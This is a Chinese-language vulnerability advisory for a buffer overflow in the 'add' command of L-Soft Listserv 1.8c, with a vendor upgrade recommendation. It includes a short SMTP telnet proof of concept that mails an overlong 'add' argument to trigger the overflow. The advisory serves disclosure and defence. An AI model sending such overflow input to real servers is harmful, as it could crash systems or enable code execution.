发布日期：2003-02-06
更新日期：2003-02-11

受影响系统：

L-Soft Listserv 1.8c

描述：

---

BUGTRAQ  ID: 6790
CVE(CAN) ID: CVE-1999-0252

L-Soft Listserv是一款流行的邮件列表管理程序。

Listserv对'add'命令参数缺少正确的边界缓冲区检查，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以Listserv进程权限在系统上执行任意指令。

可以嵌入到邮件体中的'add'命令对用户提供的参数缺少正确检查，提交超长的字符串作为参数可触发缓冲区溢出，精心构建提交参数数据可能以Listserv进程权限在系统上执行任意指令。

<*来源：PLaGuEZ （root@meat.plaguez.org）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=87602558319108&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

PLaGuEZ （root@meat.plaguez.org）提供了如下测试方法：

$ telnet xxxxxx.xxx 25

Trying 123.123.123.123...
Connected to 123.123.123.123
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
DATA
254 Enter mail, end with "." on a line by itself
From: noone

add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
.
250 RAFZ04965 Message accepted for delivery
QUIT
221 xxxxxxx.xxx closing connection

建议：

---

厂商补丁：

L-Soft
------
建议用户升级到最新L-Soft Listserv版本。

http://www.lsoft.com/products/default.asp?item=listserv

浏览次数：3847
严重程度：0（网友投票）